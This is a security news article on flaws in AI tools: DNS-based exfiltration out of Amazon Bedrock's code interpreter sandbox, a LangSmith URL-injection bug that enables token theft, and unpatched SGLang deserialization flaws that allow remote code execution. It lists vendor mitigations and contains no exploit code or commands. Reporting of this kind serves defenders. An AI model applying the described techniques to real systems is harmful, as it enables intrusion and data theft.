Bedrock's DNS Flaw Undermines Network Isolation
Security researchers at BeyondTrust have detailed a novel method for exfiltrating sensitive data from AI code execution environments using domain name system (DNS) queries. The report highlights a significant flaw in Amazon Bedrock AgentCore Code Interpreter's sandbox mode, which allows outbound DNS queries despite being configured for "no network access." This oversight creates a pathway for attackers to bypass network isolation controls.Attackers can exploit this behavior to establish bidirectional command-and-control channels and exfiltrate sensitive information. This becomes particularly dangerous if the AI's IAM role possesses overprivileged permissions to access AWS resources like S3 buckets. In such scenarios, an interactive reverse shell can be obtained, and commands executed stealthily via DNS queries. The flaw, which lacks a CVE identifier, carries a CVSS score of 7.5 out of 10.0.
While Amazon acknowledged the report, it determined the behavior to be "intended functionality rather than a defect." AWS now recommends customers use VPC mode instead of sandbox mode for complete network isolation. They also advise implementing a DNS firewall to filter outbound DNS traffic. Jason Soroko, a senior fellow at Sectigo, emphasized that "Operating within a VPC provides the necessary infrastructure for robust network isolation, allowing teams to implement strict security groups, network ACLs, and Route53 Resolver DNS Firewalls."
LangSmith and SGLang Face Critical Exploits
Beyond the Bedrock revelations, two other prominent AI tools, LangSmith and SGLang, are grappling with their own severe vulnerabilities. Miggo Security disclosed a high-severity security flaw in LangSmith (CVE-2026-25750), affecting both self-hosted and cloud deployments. This vulnerability, rated 8.5 on the CVSS scale, stems from a lack of validation on the `baseUrl` parameter, allowing for URL parameter injection.
An attacker could exploit this by tricking a user into clicking a specially crafted link. Successful exploitation leads to token theft and account takeover, granting unauthorized access to AI trace history, internal SQL queries, CRM customer records, or proprietary source code. The issue was addressed in LangSmith version 0.12.71, released in December 2025.
Meanwhile, security vulnerabilities have also been flagged in SGLang, a popular open-source framework for serving large language models. Discovered by Orca Security researcher Igor Stepansky, these flaws remain unpatched. They involve unsafe pickle deserialization, which can lead to remote code execution (RCE). The most critical vulnerabilities (CVE-2026-3059 and CVE-2026-3060) carry a CVSS score of 9.8, allowing unauthenticated RCE through the ZeroMQ (ZMQ) broker if multimodal generation or disaggregation features are exposed to the network.
A third flaw (CVE-2026-3989), rated 7.8, involves insecure deserialization in a crash dump replay utility. The CERT Coordination Center (CERT/CC) advises SGLang users to restrict access to service interfaces and implement network segmentation and access controls. This prevents unauthorized interaction with ZeroMQ endpoints and protects against potential compromises.
